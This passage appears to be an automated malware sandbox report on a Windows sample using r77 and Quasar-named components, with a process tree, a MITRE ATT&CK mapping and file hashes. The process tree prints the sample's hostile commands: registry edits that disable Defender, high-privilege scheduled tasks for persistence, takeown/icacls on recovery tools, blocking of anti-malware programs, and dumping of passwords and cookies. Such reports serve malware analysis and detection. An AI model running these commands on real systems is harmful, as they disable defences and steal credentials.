        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147772079" /t REG_SZ /d "6" /f
        5⤵
        
        PID:924
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147735505" /t REG_SZ /d "6" /f
        5⤵
        
        PID:2916
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147745502" /t REG_SZ /d "6" /f
        5⤵
        
        PID:3064
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t "REG_DWORD" /d "1" /f
        5⤵
        
        PID:2012
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "5" /t "REG_SZ" /d "6" /f
        5⤵
        
        PID:2844
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "1" /t "REG_SZ" /d "6" /f
        5⤵
        
        PID:2340
    - - C:\Windows\system32\timeout.exe
        
        timeout 10
        5⤵
        Delays execution with timeout.exe
        
        PID:1896
    - - C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
        
        "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2544
      - C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "$77Quasar.job" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe" /rl HIGHEST /f
        6⤵
        Creates scheduled task(s)
        
        PID:1008
    - - C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe
        
        "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2592
      - C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4cciCKuj10fS4tEFtsNPmrL/0jPo2AcIdfc9jK0U15Lp5iXQGku3ZLiCUn4WwDSh+A0ftN5CXUAmVy5X4PPHFWMzuIK7S46Iv9KhQeGUN+idJw7zi086Au7DP0yct2lQY=
        6⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3008
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
        7⤵
        
        PID:2932
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c compile.bat
        8⤵
        
        PID:820
        
        C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"
        9⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2272
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
        7⤵
        
        PID:2216
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c compile.bat
        8⤵
        
        PID:796
        
        C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
        
        C:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"
        9⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2264
        
        C:\Users\Admin\AppData\Local\Temp\splwow64.exe
        
        C:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"
        9⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1988
        
        C:\Users\Admin\AppData\Local\Temp\hh.exe
        
        C:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"
        9⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2500
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
        7⤵
        
        PID:2852
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c compile.bat
        8⤵
        
        PID:580
        
        C:\Users\Admin\AppData\Local\Temp\xwizard.exe
        
        C:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt"
        9⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2668
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"
        7⤵
        
        PID:2308
    - - C:\Windows\system32\schtasks.exe
        
        schtasks.exe /RU Admin /create /tn "$77Stellacy.job" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe" /sc minute /mo 1 /RL HIGHEST /f
        5⤵
        Creates scheduled task(s)
        
        PID:2128
    - - C:\Windows\system32\schtasks.exe
        
        schtasks.exe /RU Admin /create /tn "$77SX.job" /tr "'C:\Windows\System32\Wscript.exe'C:\Users\Admin\AppData\Local\Microsoft\Windows\$77vbs.vbs" /sc minute /mo 40 /RL HIGHEST /f
        5⤵
        Creates scheduled task(s)
        
        PID:440
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /RU Admin /create /tn "$77STLR.job" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe" /sc onstart /RL HIGHEST /f
        5⤵
        Creates scheduled task(s)
        
        PID:1072
    - - C:\Windows\system32\timeout.exe
        
        timeout 10
        5⤵
        Delays execution with timeout.exe
        
        PID:792
    - - C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe
        
        "C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe"
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2992
    - - C:\Windows\system32\timeout.exe
        
        timeout 20
        5⤵
        Delays execution with timeout.exe
        
        PID:1100
    - - C:\Windows\system32\ReAgentc.exe
        
        reagentc.exe /disable
        5⤵
        Drops file in System32 directory
        
        PID:2604
    - - C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:1804
    - - C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:2456
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\reagentc.exe"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:1228
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\reagentc.exe" /grant *S-1-5-32-544:F /T /C /Q
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2324
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\reagent.dll"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:1100
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\reagent.dll" /grant *S-1-5-32-544:F /T /C /Q
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2344
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /im "SecurityHealthSystray.exe" /f
        5⤵
        Kills process with taskkill
        
        PID:2432
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        5⤵
        
        PID:3004
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "MRT" /f
        5⤵
        
        PID:1044
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:1628
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "1" /t REG_SZ /d "MRT.exe" /f
        5⤵
        
        PID:2828
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "2" /t REG_SZ /d "rkill.exe" /f
        5⤵
        
        PID:792
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "3" /t REG_SZ /d "rkill32.exe" /f
        5⤵
        
        PID:2168
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "4" /t REG_SZ /d "rkill64.exe" /f
        5⤵
        
        PID:1468
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "5" /t REG_SZ /d "MBSetup.exe" /f
        5⤵
        
        PID:1248
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "6" /t REG_SZ /d "mbam.exe" /f
        5⤵
        
        PID:2608
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "7" /t REG_SZ /d "mbar.exe" /f
        5⤵
        
        PID:2984
    - - C:\Windows\system32\timeout.exe
        
        timeout 2
        5⤵
        Delays execution with timeout.exe
        
        PID:2360

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "4906880501919732171-1789141118-873434289-1181037244-164548607-15816359571966887948"
1⤵
PID:2600

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1358274098779801060-1908203181635600910-914304553-1233844611-1072337532-2017176526"
1⤵
PID:1588

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "18466195591819843000-5028146541758588992-3336836571353479939-238391346-485929852"
1⤵
- Suspicious use of SetWindowsHookEx
PID:2288

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-221359272-1760627334-884387029723734932-1434537467-1037058116-1067793631-1862466597"
1⤵
PID:2848

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1930289764-1763685211490193898-166666619190504248442564173-1823910917-93470167"
1⤵
PID:332

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1832826231-487157237-963400096-1062946300202244984-1516416266-10799751701771077586"
1⤵
PID:1580

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\$77Redownloader.exe

Filesize
3.7MB

MD5
067d274dc271710cb8afd7c0680958fe

SHA1
4282104ec316c3452a81afc623c61ed348331436

SHA256
c53fbf5e1b8a3c6c3930073c359a07aa6fcccfb1a0275dab49ed6584c20aa051

SHA512
3c3a4c4678c735419d6e92570e5c9fd0cd5b34a46bb025b71c8925a27c64f9d3e5d20b16610e3085477c88b309dcbe4335aa3d6c3bac334ab461759f1320a29c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe

Filesize
3.0MB

MD5
b7062a62e271b7dd402b7406f8a611ad

SHA1
952cbd23fd41cbc40d17c988de946ec983d262de

SHA256
d93529443f83e24a4ca90e835ab5b46fc83337862e5ab08343722945a002279c

SHA512
2f7aec552d2bcc53a218e4353c29f71e0b0af4b0c4a51c59f4ad4116e5cf46bde4584d61d3738260fb48fa03a79ec0202ba750e6e8434f4b0d3e12560fa94867

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

Filesize
341KB

MD5
9d972046c0e663416177f42d19f38e35

SHA1
23aeec718eed2be8adf5380311fc787db03bfc43

SHA256
ad541a7a9372fb33689839ac297536ff01cab78c51df04c4334cf4ce2dd4e9a4

SHA512
25e9ba52944348c5ce54df6da8efc5025aa9b8c7e4fe25f56a386f285878c3d1ef27dd5fcc22e9c51dfe25a811a0484d314b21ecfdc352d2f4bdade4e68bf808

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Backup.bat

Filesize
3KB

MD5
73336bee4fa2b1c3751fa012c9333a79

SHA1
2cc55d9440ed3c17e6b05466c10334b0d3ef0408

SHA256
435662c5b86525b076aa25aa55f06ab2f41bf34bb032544c466feac53ea378b2

SHA512
8eefbe6eb117387ab6a88a6a7d4aa919d935df22e4d60ebb3247462f9df3ea76ec4293dd2d57445a40a9c2c23188900a297e0543cec6e9ef54555617163852b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe

Filesize
311KB

MD5
964c5fffcba7f353cf12d09675a46de6

SHA1
9462c1249ef86c39da01b7480f1b2ce4a2a1a7b9

SHA256
b54e5acf0ab77f4eadf2920814d9bb3396e678fc5805fb296f9f59c41a1c52ed

SHA512
ab6dd5c11abc1abf164532f50a42584189ff1a812b255221a9705dfc47f57120e7d7f241bbb802114de79d165b002283b18a6c96b2e6e3ddc4b062757f0f8565

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\r77-x64.dll

Filesize
137KB

MD5
f876b8ce91d572547ea79104f3f24f48

SHA1
a154133be4547d099f4aefb9a5abbd55b02649be

SHA256
c1b0a94a72e64e31c5912101b759fd72d24785fd54e5e1433ebc43697f087d2c

SHA512
f3cafef52883788a12002458e382323f256b380bceacde67c919de5eb38a618db10e3cf53354787c8eddef1e1b29a1d3f97648deb1840bae5ac54af95343bcee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\r77-x86.dll

Filesize
110KB

MD5
ecfb232ae47a07667a5850104ebebe26

SHA1
53db1507d46209797cad3d4029964cdfea708d8e

SHA256
6bc8e296f6935f5688234c3810f0326faebd898688688dfe3d5475e19cc5a83a

SHA512
6cd882dd1d11ee348ab4c287bc885af780e9fc79c7028d6f682c16bdda08888d67d98ab463e53e7243efe90ced9214d0aedfc460826082b09745b4a470cb0dbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\90CB.tmp\90CC.tmp\90CD.bat

Filesize
4KB

MD5
1593a043084628c0b03101236cabc57e

SHA1
c27c59d69b39fddcb17013493a15805bafe5d54b

SHA256
05eb8e0aace249cf766bfda9b7ea9e449bc012eb44bd0ab6adc80ee9ddc81145

SHA512
d35d28d3f1ca395779a448788a7c0cbc3e1ef74784acc76b919f43146c93827536d093ba1e8f82ca5ce75e8325a06dd4669aba358d6ae373e1711be5addb3e56

Download Submit
C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe

Filesize
2.8MB

MD5
c839c9a0662b79ebf62228b2eb50f41d

SHA1
7e192da6868c2630811218906e0647e30e8c1c3a

SHA256
b283fc5c9f2addfd4035093244ec3da8e2d1ce71aba75a087dc69f988593960a

SHA512
868a542e788412f178e546768f72ce6148eba3e4ff3ef56f84aacc436ea6bca15b60959a58163282125b793af5ba539146ee35659f446305e293da8694c4ed57

Download Submit
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe

Filesize
2.8MB

MD5
88ab0bb59b0b20816a833ba91c1606d3

SHA1
72c09b7789a4bac8fee41227d101daed8437edeb

SHA256
f4fb42c8312a6002a8783e2a1ab4571eb89e92cd192b1a21e8c4582205c37312

SHA512
05cff2ca00ba940d9371c469bce6ffb4795c845d77525b8a1d4919f708296e66c0a6f3143c5964f5e963955e4f527a70624651113e72dc977f5ef40fa0276857

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar5C79.tmp

Filesize
175KB

MD5
dd73cead4b93366cf3465c8cd32e2796

SHA1
74546226dfe9ceb8184651e920d1dbfb432b314e

SHA256
a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

SHA512
ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

Download Submit
C:\Users\Admin\AppData\Local\Temp\compile.bat

Filesize
71B

MD5
91128da441ad667b8c54ebeadeca7525

SHA1
24b5c77fb68db64cba27c338e4373a455111a8cc

SHA256
50801c4db374acec11831bf7602cd2635bc8964800c67217b25683dce4a45873

SHA512
bd2a8bc4458b1bc85c5a59db872278197bb0a2a2086a1a9aa5b6b876965b9f5586959171f334237588cc6b0f9643f580db2e959f82e451f4a3043a27e4a95cdd

Download Submit
C:\Users\Admin\AppData\Local\Temp\compile.bat

Filesize
74B

MD5
808099bfbd62ec04f0ed44959bbc6160

SHA1
f4b6853d958c2c4416f6e4a5be8a11d86f64c023

SHA256
f465a1bd2f9a3efcf0589f0b1c234d285f2bebf7416b324271d987a282915ca8

SHA512
e4f75253a402f0f5d5c651cde045757dad0d4312be023fabf279d7c053fde6ba63cf387551a0451585a87f929634e0bfa73a06dac85ecd1bb5bc0b72bb98e1f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\compile.bat

Filesize
156B

MD5
eb51755b637423154d1341c6ee505f50

SHA1
d71d27e283b26e75e58c0d02f91d91a2e914c959

SHA256
db903aae119dc795581080a528ba04286be11be7e9d417305d77123545fbf0f9

SHA512
e23463fe0a3719c2700826b55f375f60e5e67f3e432aa8e90c5afc8f449fc635aa4c031f9b6fa71344a8da9542585b74e4c812383043868a10a1065d477acee5

Download Submit
C:\Users\Admin\AppData\Local\Temp\compile.vbs

Filesize
265B

MD5
ca906422a558f4bc9e471709f62ec1a9

SHA1
e3da070007fdeae52779964df6f71fcb697ffb06

SHA256
abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee

SHA512
661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b

Download Submit
C:\Users\Admin\AppData\Local\Temp\config

Filesize
108B

MD5
1ba367d0f9aac0f650e65ab7401776c0

SHA1
75cf3295125cfaa0c247ebccc57e63f915198683

SHA256
68c4ec552c98f3b5a4744e4eefadd6364dc8075c2e718b7bcbfc76625aa60d03

SHA512
45ccdf02314fe01948aa2ecddb3b50f68d5b32d8542e3a3aeaf3f2920e2285d3b75ebb81b9eb9fb9e0a446af5a3708720e07672874d5d38871dbdcd09483449c

Download Submit
C:\Users\Admin\AppData\Local\Temp\hh.exe

Filesize
103KB

MD5
4d4c98eca32b14aeb074db34cd0881e4

SHA1
92f213d609bba05d41d6941652a88c44936663a4

SHA256
4182172a01bdfc08c5cf7e8652f7d9d81858345a770e2b6b507840e4c1c7764f

SHA512
959da8bbf6084e802ed366de8d240382b8a5ab2f18bc58881f42ecb7a8ed082d0e078b3ad18dbf90ac0a14cd491b5ac8b00cf1f0a266bdb7ebb8d95c5c71cacf

Download Submit
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe

Filesize
391KB

MD5
053778713819beab3df309df472787cd

SHA1
99c7b5827df89b4fafc2b565abed97c58a3c65b8

SHA256
f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe

SHA512
35a00001c718e36e956f49879e453f18f5d6c66bbc6a3e1aad6d5dd1109904539b173c3cad0009bc021d4513a67ae0003282f7d14b7aecaa20e59a22c6ad0ddb

Download Submit
C:\Users\Admin\AppData\Local\Temp\splwow64.exe

Filesize
49KB

MD5
0d8360781e488e250587a17fbefa646c

SHA1
29bc9b438efd70defa8fc45a6f8ee524143f6d04

SHA256
ebff7d07efda7245192ce6ecd7767578152b515b510c887ca2880a2566071f64

SHA512
940a98f282473c6f706783b41b72eccce88620e12db1f91be6425f087284746e6e10d4d9420b5e79e87ec3a2fd595b9fe301576e39a4db6bd3daa4aa93a9042e

Download Submit
C:\Users\Admin\AppData\Local\Temp\whysosad

Filesize
3KB

MD5
fc3c88c2080884d6c995d48e172fbc4f

SHA1
cb1dcc479ad2533f390786b0480f66296b847ad3

SHA256
1637ce704a463bd3c91a38aa02d1030107670f91ee3f0dd4fa13d07a77ba2664

SHA512
4807d3bd44a3197d1a9dcf709a1e70e1cf3bf71fe1a9fa1479441b598154c282a620208557a4415a34d23ceb4fd32dda41edbb940b46acb2f00c696648703bf1

Download Submit
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe

Filesize
184KB

MD5
a776e68f497c996788b406a3dc5089eb

SHA1
45bf5e512752389fe71f20b64aa344f6ca0cad50

SHA256
071e26ddf5323dd9ed6671bcde89df73d78bac2336070e6cb9e3e4b93bde78d1

SHA512
02b1234ad37b768b9bcba74daf16e6b45b777f340dac0b64a85166fdd793955e3d7f88a95142b603b198e504ef1173618f840511bcdb70448f71aed19c009073

Download Submit
C:\Users\Admin\AppData\Local\Temp\xwizard.cfg

Filesize
1KB

MD5
ae8eed5a6b1470aec0e7fece8b0669ef

SHA1
ca0e896f90c38f3a8bc679ea14c808726d8ef730

SHA256
3f6ca2bc068c8436044daab867f8ff8f75060048b29882cb2ac9fdef1800df9e

SHA512
e79d04f4041edb867fd6bdf4485f78352292782d9405ba81888a1bc62f5039cc46c6cc786ba1fd53284baafa7128e0f875390cb573584ed2d03c3b33c7f93eb6

Download Submit
C:\Users\Admin\AppData\Local\Temp\xwizard.exe

Filesize
544KB

MD5
df991217f1cfadd9acfa56f878da5ee7

SHA1
0b03b34cfb2985a840db279778ca828e69813116

SHA256
deb1246347ce88e8cdd63a233a64bc2090b839f2d933a3097a2fd8fd913c4112

SHA512
175cde9e0def550f6380b4a9feb6845dfddbb641e2455d9d25dc6bfc7ffc08e654ea731946588961a5825dcc45c8b31972454a330fd97d7170f1991a8dac0316

Download Submit
C:\Windows\Tasks\$77svc32.job

Filesize
558B

MD5
875c4a407f4481b71a3beebbcb239aea

SHA1
4b948c058caadcbdc6a6201ccd7d343fdf0472c9

SHA256
ef41b3f8366006c5707ef9a42bb197eeb63b0a571dd8b22685a2d7630f3ec7ee

SHA512
7044e7216e70ac4383cff1a6c1238e728944869abf4fc8a2e9bbc1a96995f723e9022f4502a2ce809be21d0720a1396c4f9eb2b5391f4fb0ba288753d754e60c

Download Submit
C:\Windows\Tasks\$77svc64.job

Filesize
472B

MD5
40e14e73f790db8921a0b2c614a2fabe

SHA1
2cf6c3a76a846f562de9f9b309f323082201af6f

SHA256
9155218d4162ec2ed470cf6ce4e195fa1c6c7fcf7dbd0674117304712ba73b88

SHA512
d5e1b7a8f440b113be72647bf83680c475383c263b99f42f3bd553e9635d5f55eaa195e9e007ceb5cb3ff7cb2ad35e776066e261bb0bb46fe9d7054f55df2e6b

Download Submit
\Users\$77main2.exe

Filesize
91KB

MD5
6d549bf064703c4b05790538bb663d5d

SHA1
8654cd1618171d6c43a39eb6ab1b22c985bf1a94

SHA256
5b7ce7d32299b5b01e485d6423e9456e2cf79b2209ac7eeedbf2fdea42bd60e7

SHA512
5b2b8ddfc6bf7ec1687f61a86ee83e72fe4189efe3b7533989a8971e3888462075edb3f1dbb25aba3725073792abff45627b03e1200e3d6320c7f608bbecfcd1

Download Submit
\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe

Filesize
2.8MB

MD5
96df7a959e153bbc0b5f9d9ff44ff662

SHA1
6d6d860a525ac843c629dc7922e3db9c2c75035c

SHA256
b48126ffc060cdb4531963c88b50704694d9ae33b36413cf072b0080f813e2a0

SHA512
e36add518636a84d67c4564d4a43a49e29d1e5e9c20ad157291b87dbeed8819387ebeddb9c084fa1febf554eaebb5fadaae890979e2ba0f8e756b2a7eab6c357

Download Submit
memory/420-187-0x0000000000830000-0x0000000000853000-memory.dmp

Filesize
140KB

Download
memory/420-190-0x0000000000860000-0x000000000088A000-memory.dmp

Filesize
168KB

Download
memory/420-191-0x000007FEBE8E0000-0x000007FEBE8F0000-memory.dmp

Filesize
64KB

Download
memory/420-192-0x0000000037760000-0x0000000037770000-memory.dmp

Filesize
64KB

Download
memory/420-189-0x0000000000830000-0x0000000000853000-memory.dmp

Filesize
140KB

Download
memory/420-354-0x0000000077771000-0x0000000077772000-memory.dmp

Filesize
4KB

Download
memory/468-196-0x0000000000160000-0x000000000018A000-memory.dmp

Filesize
168KB

Download
memory/468-197-0x000007FEBE8E0000-0x000007FEBE8F0000-memory.dmp

Filesize
64KB

Download
memory/468-198-0x0000000037760000-0x0000000037770000-memory.dmp

Filesize
64KB

Download
memory/468-356-0x0000000000160000-0x000000000018A000-memory.dmp

Filesize
168KB

Download
memory/484-205-0x0000000037760000-0x0000000037770000-memory.dmp

Filesize
64KB

Download
memory/484-359-0x00000000008E0000-0x000000000090A000-memory.dmp

Filesize
168KB

Download
memory/484-204-0x000007FEBE8E0000-0x000007FEBE8F0000-memory.dmp

Filesize
64KB

Download
memory/484-203-0x00000000008E0000-0x000000000090A000-memory.dmp

Filesize
168KB

Download
memory/492-362-0x0000000000500000-0x000000000052A000-memory.dmp

Filesize
168KB

Download
memory/492-211-0x0000000000500000-0x000000000052A000-memory.dmp

Filesize
168KB

Download
memory/492-215-0x0000000037760000-0x0000000037770000-memory.dmp

Filesize
64KB

Download
memory/492-213-0x000007FEBE8E0000-0x000007FEBE8F0000-memory.dmp

Filesize
64KB

Download
memory/596-364-0x00000000005D0000-0x00000000005FA000-memory.dmp

Filesize
168KB

Download
memory/596-218-0x00000000005D0000-0x00000000005FA000-memory.dmp

Filesize
168KB

Download
memory/596-220-0x000007FEBE8E0000-0x000007FEBE8F0000-memory.dmp

Filesize
64KB

Download
memory/596-222-0x0000000037760000-0x0000000037770000-memory.dmp

Filesize
64KB

Download
memory/664-368-0x0000000000740000-0x000000000076A000-memory.dmp

Filesize
168KB

Download
memory/664-225-0x000007FEBE8E0000-0x000007FEBE8F0000-memory.dmp

Filesize
64KB

Download
memory/664-227-0x0000000037760000-0x0000000037770000-memory.dmp

Filesize
64KB

Download
memory/664-223-0x0000000000740000-0x000000000076A000-memory.dmp

Filesize
168KB

Download
memory/748-236-0x0000000037760000-0x0000000037770000-memory.dmp

Filesize
64KB

Download
memory/748-233-0x000007FEBE8E0000-0x000007FEBE8F0000-memory.dmp

Filesize
64KB

Download
memory/748-370-0x0000000000880000-0x00000000008AA000-memory.dmp

Filesize
168KB

Download
memory/748-232-0x0000000000880000-0x00000000008AA000-memory.dmp

Filesize
168KB

Download
memory/800-237-0x0000000000840000-0x000000000086A000-memory.dmp

Filesize
168KB

Download
memory/800-240-0x000007FEBE8E0000-0x000007FEBE8F0000-memory.dmp

Filesize
64KB

Download
memory/800-372-0x0000000000840000-0x000000000086A000-memory.dmp

Filesize
168KB

Download
memory/800-374-0x0000000037760000-0x0000000037770000-memory.dmp

Filesize
64KB

Download
memory/828-377-0x0000000000BE0000-0x0000000000C0A000-memory.dmp

Filesize
168KB

Download
memory/828-380-0x0000000037760000-0x0000000037770000-memory.dmp

Filesize
64KB

Download
memory/984-382-0x00000000009A0000-0x00000000009CA000-memory.dmp

Filesize
168KB

Download
memory/984-384-0x0000000037760000-0x0000000037770000-memory.dmp

Filesize
64KB

Download
